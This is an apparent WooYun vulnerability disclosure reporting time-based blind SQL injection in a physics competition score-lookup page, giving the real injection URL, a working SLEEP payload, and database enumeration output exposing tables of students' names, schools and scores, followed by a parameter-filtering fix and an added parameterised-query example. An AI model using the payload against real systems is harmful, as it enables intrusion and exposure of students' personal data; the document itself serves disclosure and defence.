
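SQL injection in the National Physics Competition for Secondary School Students score lookup system exposes a large amount of candidate information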

2014-11-06 03:50

Injection point: http://app.eduuu.com/wulijs/search.php

POST data: yid=10&con_id=17&exam_code=123123&name=123213&submit=

The yid parameter, among others, is injectable.



---

Place: POST

Parameter: yid

Type: AND/OR time-based blind

Title: MySQL > 5.0.11 AND time-based blind

Payload: yid=10' AND SLEEP(5) AND 'djDf'='djDf&con_id=17&exam_code=123123&name=123213&submit=

---

back-end DBMS: MySQL 5.0.11

Database: wljs_score

[11 tables]

+----------------+

| Sheet1 |

| user |

| aa |

| bak |

| contest |

| contest1 |

| score |

| score1 |

| score_20120507 |

| test |

| uear |

+----------------+



---

back-end DBMS: MySQL 5.0.11

Database: wljs_score

+-------+---------+

| Table | Entries |

+-------+---------+

| score | 8143 |

+-------+---------+



---

back-end DBMS: MySQL 5.0.11

Database: wljs_score

+--------+---------+

| Table | Entries |

+--------+---------+

| score1 | 2575 |

+--------+---------+



---

back-end DBMS: MySQL 5.0.11

Database: wljs_score

Table: score

[8 columns]

+--------------+--------------+

| Column | Type |

+--------------+--------------+

| con_id | int(8) |

| exam_code | varchar(32) |

| name | varchar(50) |

| sc_id | int(8) |

| school | varchar(50) |

| score | int(3) |

| score_detail | varchar(255) |

| status | tinyint(1) |

+--------------+--------------+



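The data amounts to roughly 10,000 rows, including candidates' names, schools, exam registration numbers and detailed scores. Once dumped, the database could be put to illegal use.

Proof of vulnerability: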

---

back-end DBMS: MySQL 5.0.11

Database: wljs_score

+-------+---------+

| Table | Entries |

+-------+---------+

| score | 8143 |

+-------+---------+



---

back-end DBMS: MySQL 5.0.11

Database: wljs_score

+--------+---------+

| Table | Entries |

+--------+---------+

| score1 | 2575 |

+--------+---------+

No data was downloaded.

Fix:

#1. Filter the parameters
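
An added example (not from the original report or the affected site's code) of what filtering the parameters looks like in practice: integer fields are validated and every value is bound as a query placeholder, so a string such as the time-based payload against yid is rejected before any SQL runs. It uses Python with an in-memory SQLite table as a stand-in for the MySQL `score` table; the `search_score` handler, the query shape and the sample rows are assumptions.

```python
import sqlite3

# Constructed sample rows; column names follow the `score` table listed above.
SAMPLE_ROWS = [
    (17, "123123", "Alice", "No.1 Middle School", 88),
    (17, "456456", "Bob", "No.2 Middle School", 75),
]

def make_db():
    """In-memory SQLite stand-in for the MySQL `score` table (assumption)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE score (con_id INTEGER, exam_code TEXT, "
               "name TEXT, school TEXT, score INTEGER)")
    db.executemany("INSERT INTO score VALUES (?, ?, ?, ?, ?)", SAMPLE_ROWS)
    return db

def parse_id(raw, field):
    """Accept only a short run of ASCII digits for integer fields (yid, con_id)."""
    if not (raw.isascii() and raw.isdigit() and len(raw) <= 8):
        raise ValueError(f"{field} must be an integer")
    return int(raw)

def search_score(db, form):
    """Hypothetical handler for the search form: validate first, then bind."""
    # How yid is used server-side is not shown in the report; it is only validated here.
    parse_id(form["yid"], "yid")
    con_id = parse_id(form["con_id"], "con_id")
    exam_code, name = form["exam_code"], form["name"]
    # Length limits taken from the column types: varchar(32) and varchar(50).
    if len(exam_code) > 32 or len(name) > 50:
        raise ValueError("field too long")
    # Placeholders keep user input out of the SQL text entirely.
    cur = db.execute(
        "SELECT name, school, score FROM score "
        "WHERE con_id = ? AND exam_code = ? AND name = ?",
        (con_id, exam_code, name))
    return cur.fetchall()
```

With a real MySQL driver the same pattern applies; only the placeholder syntax differs by driver.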


Source: www.wooyun.org/bugs/wooyun-2014-076852
